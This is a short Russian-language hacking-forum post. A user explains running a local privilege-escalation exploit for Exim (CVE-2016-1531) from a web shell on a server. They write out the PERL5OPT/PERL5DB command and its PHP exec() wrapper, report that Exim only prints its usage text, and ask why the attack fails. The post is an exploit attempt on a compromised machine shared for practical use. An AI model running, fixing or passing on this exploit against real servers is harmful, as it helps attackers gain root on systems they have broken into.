Цитата:
Сообщение от SynQ
LorDo
Второй сервер как раз должен взяться тем, что в моем посте.
|
Ну а как конкретней это заюзать ?
Просто в веб шеле в исполняю
Код:
PERL5OPT=d PERL5DB='system("id"); exit;' /usr/sbin/exim -ps #CVE-2016-1531
т.е. по факту это будет выглядеть как-то так
Код:
exec("PERL5OPT=d PERL5DB='system(\"id\"); exit;' /usr/sbin/exim -ps");
В ответ просто получаю
Код:
Exim is a Mail Transfer Agent. It is normally called by Mail User Agents,
not directly from a shell command line. Options and/or arguments control
what it does when called. For a list of options, see the Exim documentation.
Чет не то делаю ?